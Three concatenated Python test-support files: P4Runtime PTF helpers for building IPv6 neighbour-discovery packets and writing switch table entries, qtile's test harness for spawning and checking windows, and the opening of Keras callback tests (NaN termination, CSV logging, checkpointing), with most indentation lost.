DEFAULT_PRIORITY = 10
IPV6_MCAST_MAC_1 = "33:33:00:00:00:01"
SWITCH1_MAC = "00:00:00:00:aa:01"
SWITCH2_MAC = "00:00:00:00:aa:02"
SWITCH3_MAC = "00:00:00:00:aa:03"
HOST1_MAC = "00:00:00:00:00:01"
HOST2_MAC = "00:00:00:00:00:02"
MAC_BROADCAST = "FF:FF:FF:FF:FF:FF"
MAC_FULL_MASK = "FF:FF:FF:FF:FF:FF"
MAC_MULTICAST = "33:33:00:00:00:00"
MAC_MULTICAST_MASK = "FF:FF:00:00:00:00"
SWITCH1_IPV6 = "2001:0:1::1"
SWITCH2_IPV6 = "2001:0:2::1"
SWITCH3_IPV6 = "2001:0:3::1"
SWITCH4_IPV6 = "2001:0:4::1"
HOST1_IPV6 = "2001:0000:85a3::8a2e:370:1111"
HOST2_IPV6 = "2001:0000:85a3::8a2e:370:2222"
IPV6_MASK_ALL = "FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF"
ARP_ETH_TYPE = 0x0806
IPV6_ETH_TYPE = 0x86DD
ICMPV6_IP_PROTO = 58
NS_ICMPV6_TYPE = 135
NA_ICMPV6_TYPE = 136
def print_inline(text):
sys.stdout.write(text)
sys.stdout.flush()
# See https://gist.github.com/carymrobbins/8940382
# functools.partialmethod is introduced in Python 3.4
class partialmethod(partial):
def __get__(self, instance, owner):
if instance is None:
return self
return partial(self.func, instance, *(self.args or ()), **(self.keywords or {}))
# Convert integer (with length) to binary byte string
# Equivalent to Python 3.2 int.to_bytes
# See
# https://stackoverflow.com/questions/16022556/has-python-3-to-bytes-been-back-ported-to-python-2-7
def stringify(n, length):
    # Python 3: int.to_bytes does exactly what the old Python 2 hex-string trick did.
    return n.to_bytes(length, byteorder='big')
def ipv4_to_binary(addr):
    bytes_ = [int(b, 10) for b in addr.split('.')]
    return bytes(bytes_)
def ipv6_to_binary(addr):
    ip = ip_address(addr)
    return ip.packed
def mac_to_binary(addr):
    bytes_ = [int(b, 16) for b in addr.split(':')]
    return bytes(bytes_)
def format_pkt_match(received_pkt, expected_pkt):
# Taken from PTF dataplane class
stdout_save = sys.stdout
try:
# The scapy packet dissection methods print directly to stdout,
# so we have to redirect stdout to a string.
sys.stdout = StringIO()
print("========== EXPECTED ==========")
if isinstance(expected_pkt, scapy.packet.Packet):
scapy.packet.ls(expected_pkt)
print('--')
scapy.utils.hexdump(expected_pkt)
print("========== RECEIVED ==========")
if isinstance(received_pkt, scapy.packet.Packet):
scapy.packet.ls(received_pkt)
print('--')
scapy.utils.hexdump(received_pkt)
print("==============================")
return sys.stdout.getvalue()
finally:
sys.stdout.close()
sys.stdout = stdout_save # Restore the original stdout.
def format_pb_msg_match(received_msg, expected_msg):
result = StringIO()
result.write("========== EXPECTED PROTO ==========\n")
result.write(text_format.MessageToString(expected_msg))
result.write("========== RECEIVED PROTO ==========\n")
result.write(text_format.MessageToString(received_msg))
result.write("==============================\n")
val = result.getvalue()
result.close()
return val
def pkt_mac_swap(pkt):
orig_dst = pkt[Ether].dst
pkt[Ether].dst = pkt[Ether].src
pkt[Ether].src = orig_dst
return pkt
def pkt_route(pkt, mac_dst):
pkt[Ether].src = pkt[Ether].dst
pkt[Ether].dst = mac_dst
return pkt
def pkt_decrement_ttl(pkt):
if IP in pkt:
pkt[IP].ttl -= 1
elif IPv6 in pkt:
pkt[IPv6].hlim -= 1
return pkt
def genNdpNsPkt(target_ip, src_mac=HOST1_MAC, src_ip=HOST1_IPV6):
nsma = in6_getnsma(inet_pton(socket.AF_INET6, target_ip))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm) / IPv6(dst=d, src=src_ip, hlim=255)
p /= ICMPv6ND_NS(tgt=target_ip)
p /= ICMPv6NDOptSrcLLAddr(lladdr=src_mac)
return p
def genNdpNaPkt(target_ip, target_mac, src_mac=SWITCH1_MAC, dst_mac=IPV6_MCAST_MAC_1,
src_ip=SWITCH1_IPV6, dst_ip=HOST1_IPV6):
p = Ether(src=src_mac, dst=dst_mac)
p /= IPv6(dst=dst_ip, src=src_ip, hlim=255)
p /= ICMPv6ND_NA(tgt=target_ip)
p /= ICMPv6NDOptDstLLAddr(lladdr=target_mac)
return p
class P4RuntimeErrorFormatException(Exception):
"""Used to indicate that the gRPC error Status object returned by the server has
an incorrect format.
"""
def __init__(self, message):
super(P4RuntimeErrorFormatException, self).__init__(message)
# Used to iterate over the p4.Error messages in a gRPC error Status object
class P4RuntimeErrorIterator:
def __init__(self, grpc_error):
assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
self.grpc_error = grpc_error
error = None
# The gRPC Python package does not have a convenient way to access the
# binary details for the error: they are treated as trailing metadata.
for meta in itertools.chain(self.grpc_error.initial_metadata(),
self.grpc_error.trailing_metadata()):
if meta[0] == "grpc-status-details-bin":
error = status_pb2.Status()
error.ParseFromString(meta[1])
break
if error is None:
raise P4RuntimeErrorFormatException("No binary details field")
if len(error.details) == 0:
raise P4RuntimeErrorFormatException(
"Binary details field has empty Any details repeated field")
self.errors = error.details
self.idx = 0
def __iter__(self):
return self
def __next__(self):
while self.idx < len(self.errors):
p4_error = p4runtime_pb2.Error()
one_error_any = self.errors[self.idx]
if not one_error_any.Unpack(p4_error):
raise P4RuntimeErrorFormatException("Cannot convert Any message to p4.Error")
            if p4_error.canonical_code == code_pb2.OK:
                # Skip OK entries, but still advance the index to avoid an infinite loop.
                self.idx += 1
                continue
v = self.idx, p4_error
self.idx += 1
return v
raise StopIteration
# P4Runtime uses a 3-level message in case of an error during the processing of
# a write batch. This means that if we do not wrap the grpc.RpcError inside a
# custom exception, we can end-up with a non-helpful exception message in case
# of failure as only the first level will be printed. In this custom exception
# class, we extract the nested error message (one for each operation included in
# the batch) in order to print error code + user-facing message. See P4 Runtime
# documentation for more details on error-reporting.
class P4RuntimeWriteException(Exception):
def __init__(self, grpc_error):
assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
super(P4RuntimeWriteException, self).__init__()
self.errors = []
try:
error_iterator = P4RuntimeErrorIterator(grpc_error)
for error_tuple in error_iterator:
self.errors.append(error_tuple)
except P4RuntimeErrorFormatException:
raise # just propagate exception for now
def __str__(self):
message = "Error(s) during Write:\n"
for idx, p4_error in self.errors:
code_name = code_pb2._CODE.values_by_number[p4_error.canonical_code].name
message += "\t* At index {}: {}, '{}'\n".format(idx, code_name, p4_error.message)
return message
# This code is common to all tests. setUp() is invoked at the beginning of the
# test and tearDown is called at the end, no matter whether the test passed /
# failed / errored.
# noinspection PyUnresolvedReferences
class P4RuntimeTest(BaseTest):
def setUp(self):
BaseTest.setUp(self)
# Setting up PTF dataplane
self.dataplane = ptf.dataplane_instance
self.dataplane.flush()
self._swports = []
for device, port, ifname in config["interfaces"]:
self._swports.append(port)
self.port1 = self.swports(0)
self.port2 = self.swports(1)
self.port3 = self.swports(2)
grpc_addr = testutils.test_param_get("grpcaddr")
if grpc_addr is None:
grpc_addr = 'localhost:50051'
        self.device_id = testutils.test_param_get("device_id")
        if self.device_id is None:
            self.fail("Device ID is not set")
        self.device_id = int(self.device_id)
        self.cpu_port = testutils.test_param_get("cpu_port")
        if self.cpu_port is None:
            self.fail("CPU port is not set")
        self.cpu_port = int(self.cpu_port)
pltfm = testutils.test_param_get("pltfm")
if pltfm is not None and pltfm == 'hw' and getattr(self, "_skip_on_hw", False):
raise SkipTest("Skipping test in HW")
self.channel = grpc.insecure_channel(grpc_addr)
self.stub = p4runtime_pb2_grpc.P4RuntimeStub(self.channel)
proto_bin_path = testutils.test_param_get("p4info")
# print "Importing p4info proto from", proto_bin_path
self.p4info = p4info_pb2.P4Info()
with open(proto_bin_path, "rb") as fin:
self.p4info.ParseFromString(fin.read())
self.helper = P4InfoHelper(self.p4info)
# used to store write requests sent to the P4Runtime server, useful for
# autocleanup of tests (see definition of autocleanup decorator below)
self.reqs = []
self.election_id = 1
self.set_up_stream()
def set_up_stream(self):
self.stream_out_q = queue.Queue()
self.stream_in_q = queue.Queue()
def stream_req_iterator():
while True:
p = self.stream_out_q.get()
if p is None:
break
yield p
def stream_recv(stream):
for p in stream:
self.stream_in_q.put(p)
self.stream = self.stub.StreamChannel(stream_req_iterator())
self.stream_recv_thread = threading.Thread(target=stream_recv, args=(self.stream,))
self.stream_recv_thread.start()
self.handshake()
def handshake(self):
req = p4runtime_pb2.StreamMessageRequest()
arbitration = req.arbitration
arbitration.device_id = self.device_id
election_id = arbitration.election_id
election_id.high = 0
election_id.low = self.election_id
self.stream_out_q.put(req)
rep = self.get_stream_message("arbitration", timeout=2)
if rep is None:
self.fail("Failed to establish handshake")
def tearDown(self):
self.tear_down_stream()
BaseTest.tearDown(self)
def tear_down_stream(self):
self.stream_out_q.put(None)
self.stream_recv_thread.join()
def get_packet_in(self, timeout=2):
msg = self.get_stream_message("packet", timeout)
if msg is None:
self.fail("PacketIn message not received")
else:
return msg.packet
def get_digest_list(self, timeout=2, fail=True):
msg = self.get_stream_message("digest", timeout)
if msg is None:
if fail:
self.fail("DigestList message not received")
else:
pass
else:
return msg.digest
def verify_packet_in(self, exp_packet_in_msg, timeout=2):
rx_packet_in_msg = self.get_packet_in(timeout=timeout)
# Check payload first, then metadata
rx_pkt = Ether(rx_packet_in_msg.payload)
exp_pkt = exp_packet_in_msg.payload
if not match_exp_pkt(exp_pkt, rx_pkt):
self.fail("Received PacketIn.payload is not the expected one\n" +
format_pkt_match(rx_pkt, exp_pkt))
rx_meta_dict = {m.metadata_id: m.value for m in rx_packet_in_msg.metadata}
exp_meta_dict = {m.metadata_id: m.value for m in exp_packet_in_msg.metadata}
shared_meta = {
mid: rx_meta_dict[mid]
for mid in rx_meta_dict
if mid in exp_meta_dict and rx_meta_dict[mid] == exp_meta_dict[mid]
}
        if len(rx_meta_dict) != len(exp_meta_dict) \
                or len(shared_meta) != len(exp_meta_dict):
self.fail("Received PacketIn.metadata is not the expected one\n" +
format_pb_msg_match(rx_packet_in_msg, exp_packet_in_msg))
def verify_digest_list(self, digest_name, exp_data, timeout=2):
rx_digest_list_msg = self.get_digest_list(timeout=timeout)
exp_digest_id = self.helper.get_digests_id(digest_name)
        self.assertEqual(exp_digest_id, rx_digest_list_msg.digest_id,
                         "Received digest_id does not match the expected one")
rx_data_list = rx_digest_list_msg.data
if len(rx_data_list) != 1:
self.fail("Received DigestList.data should have only 1 entry, %s found" %
len(rx_data_list))
rx_data = rx_data_list[0]
if exp_data != rx_data:
self.fail("Received DigestList.data[0] is not the expected one\n" +
format_pb_msg_match(rx_data, exp_data))
def verify_no_other_digest_list(self, timeout=1):
rx_digest_list_msg = self.get_digest_list(timeout=timeout, fail=False)
if rx_digest_list_msg is not None:
self.fail("Received DigestList but expected none")
def get_stream_message(self, type_, timeout=1):
start = time.time()
try:
while True:
remaining = timeout - (time.time() - start)
if remaining < 0:
break
msg = self.stream_in_q.get(timeout=remaining)
if not msg.HasField(type_):
continue
return msg
        except queue.Empty:  # timeout expired
            pass
return None
def send_packet_out(self, packet_out):
packet_out_req = p4runtime_pb2.StreamMessageRequest()
packet_out_req.packet.CopyFrom(packet_out)
self.stream_out_q.put(packet_out_req)
def swports(self, idx):
if idx >= len(self._swports):
self.fail("Index {} is out-of-bound of port map".format(idx))
return self._swports[idx]
def _write(self, req):
try:
return self.stub.Write(req)
except grpc.RpcError as e:
if e.code() != grpc.StatusCode.UNKNOWN:
raise e
raise P4RuntimeWriteException(e)
def write_request(self, req, store=True):
rep = self._write(req)
if store:
self.reqs.append(req)
return rep
def modify(self, entity):
if isinstance(entity, list) or isinstance(entity, tuple):
for e in entity:
                self.modify(e)
return
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.MODIFY
if isinstance(entity, p4runtime_pb2.TableEntry):
msg_entity = update.entity.table_entry
else:
self.fail("Entity %s not supported" % entity.__class__.__name__)
msg_entity.CopyFrom(entity)
self.write_request(req)
def insert(self, entity):
if isinstance(entity, list) or isinstance(entity, tuple):
for e in entity:
self.insert(e)
return
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
if isinstance(entity, p4runtime_pb2.TableEntry):
msg_entity = update.entity.table_entry
elif isinstance(entity, p4runtime_pb2.ActionProfileGroup):
msg_entity = update.entity.action_profile_group
elif isinstance(entity, p4runtime_pb2.ActionProfileMember):
msg_entity = update.entity.action_profile_member
elif isinstance(entity, p4runtime_pb2.DigestEntry):
msg_entity = update.entity.digest_entry
else:
self.fail("Entity %s not supported" % entity.__class__.__name__)
msg_entity.CopyFrom(entity)
self.write_request(req)
def delete(self, entity):
if isinstance(entity, list) or isinstance(entity, tuple):
for e in entity:
                self.delete(e)
return
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.DELETE
if isinstance(entity, p4runtime_pb2.TableEntry):
msg_entity = update.entity.table_entry
else:
self.fail("Entity %s not supported" % entity.__class__.__name__)
msg_entity.CopyFrom(entity)
self.write_request(req)
def get_new_write_request(self):
req = p4runtime_pb2.WriteRequest()
req.device_id = self.device_id
election_id = req.election_id
election_id.high = 0
election_id.low = self.election_id
return req
def insert_pre_multicast_group(self, group_id, ports):
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
pre_entry = update.entity.packet_replication_engine_entry
mg_entry = pre_entry.multicast_group_entry
mg_entry.multicast_group_id = group_id
for port in ports:
replica = mg_entry.replicas.add()
replica.egress_port = port
replica.instance = 0
return req, self.write_request(req)
def insert_pre_clone_session(self, session_id, ports, cos=0, packet_length_bytes=0):
req = self.get_new_write_request()
update = req.updates.add()
update.type = p4runtime_pb2.Update.INSERT
pre_entry = update.entity.packet_replication_engine_entry
clone_entry = pre_entry.clone_session_entry
clone_entry.session_id = session_id
clone_entry.class_of_service = cos
clone_entry.packet_length_bytes = packet_length_bytes
for port in ports:
replica = clone_entry.replicas.add()
replica.egress_port = port
replica.instance = 1
return req, self.write_request(req)
# iterates over all requests in reverse order; if they are INSERT updates,
# replay them as DELETE updates; this is a convenient way to clean-up a lot
# of switch state
def undo_write_requests(self, reqs):
updates = []
for req in reversed(reqs):
for update in reversed(req.updates):
if update.type == p4runtime_pb2.Update.INSERT:
updates.append(update)
new_req = self.get_new_write_request()
for update in updates:
update.type = p4runtime_pb2.Update.DELETE
new_req.updates.add().CopyFrom(update)
self._write(new_req)
# This decorator can be used on the runTest method of P4Runtime PTF tests.
# When it is used, undo_write_requests will be called at the end of the test
# (irrespective of whether the test passed, failed, or raised an exception).
# When this decorator is used, all write requests must be performed through one
# of the send_request_* convenience functions, or by calling write_request;
# do not use stub.Write directly!
# Most of the time it is a good idea to use this decorator, as it makes tests
# less verbose. In some circumstances it is difficult to use, in particular
# when the test itself issues DELETE requests to remove objects. In that case
# you will want to do the cleanup yourself (for example in the tearDown
# method); you can still use undo_write_requests, which should make things
# easier.
# Because the PTF test writer needs to choose whether or not to use
# autocleanup, it seems more appropriate to define a decorator for this rather
# than doing it unconditionally in the P4RuntimeTest tearDown method.
def autocleanup(f):
@wraps(f)
def handle(*args, **kwargs):
test = args[0]
assert (isinstance(test, P4RuntimeTest))
try:
return f(*args, **kwargs)
finally:
test.undo_write_requests(test.reqs)
return handle
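# Illustrative sketch (not part of this module): a test that opts in to
# automatic cleanup. The table entry is left unpopulated for brevity; a real
# test would fill in table_id, match fields and the action.
#
#   class MyTableTest(P4RuntimeTest):
#       @autocleanup
#       def runTest(self):
#           te = p4runtime_pb2.TableEntry()
#           # ... populate table_id, match fields and action ...
#           self.insert(te)
#           # no explicit DELETE needed: the INSERTs recorded in self.reqs are
#           # replayed as DELETEs by undo_write_requests() when the test ends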
def skip_on_hw(cls):
cls._skip_on_hw = True
return cls
|
helpers.py
|
"""
This file contains various helpers and basic variables for the test suite.
Defining them here rather than in conftest.py avoids issues with circular imports
between test/conftest.py and test/backend/<backend>/conftest.py files.
"""
import functools
import logging
import multiprocessing
import os
import subprocess
import sys
import tempfile
import time
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from libqtile import command, config, ipc, layout
from libqtile.confreader import Config
from libqtile.core.manager import Qtile
from libqtile.lazy import lazy
from libqtile.log_utils import init_log
from libqtile.resources import default_config
# the sizes for outputs
WIDTH = 800
HEIGHT = 600
SECOND_WIDTH = 640
SECOND_HEIGHT = 480
max_sleep = 5.0
sleep_time = 0.1
class Retry:
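    """Decorator factory that retries a callable until it succeeds or a time budget expires.

    The wrapped function is retried whenever it raises one of `ignore_exceptions`;
    an AssertionError that is not in `ignore_exceptions` stops retrying
    immediately. Between attempts the wrapper sleeps `dt` seconds, growing by a
    factor of 1.5 each retry, until roughly `tmax` seconds have elapsed. On
    failure it either returns False (`return_on_fail=True`) or raises
    AssertionError(`fail_msg`).

    Illustrative usage (the condition shown is schematic):

        @Retry(ignore_exceptions=(AssertionError,), fail_msg="window never mapped")
        def window_mapped(client):
            assert len(client.windows()) > 0
            return True
    """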
def __init__(self, fail_msg='retry failed!', ignore_exceptions=(),
dt=sleep_time, tmax=max_sleep, return_on_fail=False):
self.fail_msg = fail_msg
self.ignore_exceptions = ignore_exceptions
self.dt = dt
self.tmax = tmax
self.return_on_fail = return_on_fail
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
tmax = time.time() + self.tmax
dt = self.dt
ignore_exceptions = self.ignore_exceptions
while time.time() <= tmax:
try:
return fn(*args, **kwargs)
except ignore_exceptions:
pass
except AssertionError:
break
time.sleep(dt)
dt *= 1.5
if self.return_on_fail:
return False
else:
raise AssertionError(self.fail_msg)
return wrapper
class BareConfig(Config):
auto_fullscreen = True
groups = [
config.Group("a"),
config.Group("b"),
config.Group("c"),
config.Group("d")
]
layouts = [
layout.stack.Stack(num_stacks=1),
layout.stack.Stack(num_stacks=2)
]
floating_layout = default_config.floating_layout
keys = [
config.Key(
["control"],
"k",
lazy.layout.up(),
),
config.Key(
["control"],
"j",
lazy.layout.down(),
),
]
mouse = []
screens = [config.Screen()]
follow_mouse_focus = False
reconfigure_screens = False
class Backend(metaclass=ABCMeta):
"""A base class to help set up backends passed to TestManager"""
def __init__(self, env, args=()):
self.env = env
self.args = args
def create(self):
"""This is used to instantiate the Core"""
return self.core(*self.args)
def configure(self, manager):
"""This is used to do any post-startup configuration with the manager"""
pass
@abstractmethod
def fake_click(self, x, y):
"""Click at the specified coordinates"""
pass
@abstractmethod
def get_all_windows(self):
"""Get a list of all windows in ascending order of Z position"""
pass
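# Illustrative sketch (schematic, not a real backend): a concrete Backend is
# expected to provide a `core` attribute, which create() instantiates as
# self.core(*self.args), and to implement the abstract methods. `SomeCore` is
# a placeholder name.
#
#   class FakeBackend(Backend):
#       core = SomeCore
#
#       def fake_click(self, x, y):
#           ...
#
#       def get_all_windows(self):
#           return []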
@Retry(ignore_exceptions=(ipc.IPCError,), return_on_fail=True)
def can_connect_qtile(socket_path, *, ok=None):
if ok is not None and not ok():
raise AssertionError()
ipc_client = ipc.Client(socket_path)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
client = command.client.InteractiveCommandClient(ipc_command)
val = client.status()
if val == 'OK':
return True
return False
class TestManager:
"""Spawn a Qtile instance
    Set up a Qtile server instance on the given display, with the given socket
    and log files. The Qtile server must be started, and then stopped when it
    is done. Windows can be spawned for the Qtile instance to interact with
    using the various `.test_*` methods.
"""
def __init__(self, backend, debug_log):
self.backend = backend
self.log_level = logging.DEBUG if debug_log else logging.INFO
self.backend.manager = self
self.proc = None
self.c = None
self.testwindows = []
def __enter__(self):
"""Set up resources"""
self._sockfile = tempfile.NamedTemporaryFile()
self.sockfile = self._sockfile.name
return self
def __exit__(self, _exc_type, _exc_value, _exc_tb):
"""Clean up resources"""
self.terminate()
self._sockfile.close()
def start(self, config_class, no_spawn=False, state=None):
rpipe, wpipe = multiprocessing.Pipe()
def run_qtile():
try:
os.environ.pop("DISPLAY", None)
os.environ.pop("WAYLAND_DISPLAY", None)
kore = self.backend.create()
os.environ.update(self.backend.env)
init_log(self.log_level, log_path=None, log_color=False)
Qtile(
kore,
config_class(),
socket_path=self.sockfile,
no_spawn=no_spawn,
state=state
).loop()
except Exception:
wpipe.send(traceback.format_exc())
self.proc = multiprocessing.Process(target=run_qtile)
self.proc.start()
# First, wait for socket to appear
if can_connect_qtile(self.sockfile, ok=lambda: not rpipe.poll()):
ipc_client = ipc.Client(self.sockfile)
ipc_command = command.interface.IPCCommandInterface(ipc_client)
self.c = command.client.InteractiveCommandClient(ipc_command)
self.backend.configure(self)
return
if rpipe.poll(0.1):
error = rpipe.recv()
raise AssertionError("Error launching qtile, traceback:\n%s" % error)
raise AssertionError("Error launching qtile")
def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level, log_path=None, log_color=False)
kore = self.backend.create()
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
Uses the function `create` to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg='Window never appeared...')
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
Spawns a new subprocess for a command that opens a window, given by the
arguments to this method. Spawns the new process and checks that qtile
maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
# Ensure the client only uses the test display
env = os.environ.copy()
env.pop("DISPLAY", None)
env.pop("WAYLAND_DISPLAY", None)
env.update(self.backend.env)
proc = subprocess.Popen(args, env=env)
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError('window is still in client list!')
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, floating=False, wm_type="normal"):
"""
Create a simple window in X or Wayland. If `floating` is True then the wmclass
is set to "dialog", which triggers auto-floating based on `default_float_rules`.
`wm_type` can be changed from "normal" to "notification", which creates a window
that not only floats but does not grab focus.
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
python = sys.executable
path = Path(__file__).parent / "scripts" / "window.py"
wmclass = "dialog" if floating else "TestWindow"
return self._spawn_window(python, path, "--name", wmclass, name, wm_type)
def test_notification(self, name="notification"):
return self.test_window(name, wm_type="notification")
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError(
"Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens had an attached group."
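# Illustrative sketch (schematic; in the real suite this wiring is provided by
# pytest fixtures and a concrete Backend): typical TestManager lifecycle.
#
#   with TestManager(backend, debug_log=False) as manager:
#       manager.start(BareConfig)
#       manager.test_window("one")              # spawn a client window
#       assert len(manager.c.windows()) == 1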
@Retry(ignore_exceptions=(AssertionError,), fail_msg='Window did not die!')
def assert_window_died(client, window_info):
client.sync()
wid = window_info['id']
assert wid not in set([x['id'] for x in client.windows()])
|
test_callbacks.py
|
import os
import multiprocessing
import numpy as np
import pytest
from csv import reader
from csv import Sniffer
import shutil
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential, Model
from keras.layers import Input, Dense, Dropout, add
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D
from keras.utils.test_utils import get_test_data
from keras.utils.test_utils import keras_test
from keras import backend as K
from keras.utils import np_utils
input_dim = 2
num_hidden = 4
num_classes = 2
batch_size = 5
train_samples = 20
test_samples = 20
@keras_test
def test_TerminateOnNaN():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN()]
model = Sequential()
initializer = initializers.Constant(value=1e5)
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
kernel_initializer=initializer))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
# case 1 fit
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf
# case 2 fit_generator
def data_generator():
max_batch_index = len(X_train) // batch_size
i = 0
while 1:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
history = model.fit_generator(data_generator(),
len(X_train),
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf or np.isnan(loss[0])
@keras_test
def test_stop_training_csv(tmpdir):
np.random.seed(1337)
fp = str(tmpdir / 'test.csv')
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)]
model = Sequential()
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(X_train) // batch_size
tot = 0
while 1:
if tot > 3 * len(X_train):
yield np.ones([batch_size, input_dim]) * np.nan, np.ones([batch_size, num_classes]) * np.nan
else:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
i += 1
tot += 1
i = i % max_batch_index
history = model.fit_generator(data_generator(),
len(X_train) // batch_size,
validation_data=(X_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in reader(f):
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
os.remove(fp)
@keras_test
def test_ModelCheckpoint(tmpdir):
np.random.seed(1337)
filepath = str(tmpdir / 'checkpoint.h5')
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_classes)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.isfile(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
assert os.path.isfile(filepath.format(epoch=2))
assert os.path.isfile(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not tmpdir.listdir()
@keras_test
def test_EarlyStopping():
